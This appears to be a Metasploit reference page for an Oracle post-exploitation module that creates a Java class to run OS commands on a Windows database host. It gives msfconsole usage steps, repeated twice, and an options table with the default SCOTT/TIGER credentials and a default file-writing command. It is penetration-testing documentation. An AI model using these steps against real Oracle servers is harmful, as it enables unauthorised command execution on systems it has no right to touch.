Oracle Java execCommand (Win32)
This module will create a java class which enables the execution of OS commands.
Rank
- Normal
Authors
- MC < mc [at] metasploit.com >
Vulnerability References
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf auxiliary(win32exec) > set RHOST [TARGET IP]
msf auxiliary(win32exec) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf auxiliary(win32exec) > set RHOST [TARGET IP]
msf auxiliary(win32exec) > run
Module Options
| CMD | The OS command to execute. (default: echo metasploit > %SYSTEMDRIVE%\\unbreakable.txt) |
| DBPASS | The password to authenticate with. (default: TIGER) |
| DBUSER | The username to authenticate with. (default: SCOTT) |
| RHOST | The Oracle host. (default: ) |
| RPORT | The TNS port. (default: 1521) |
| SID | The sid to authenticate with. (default: ORCL) |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
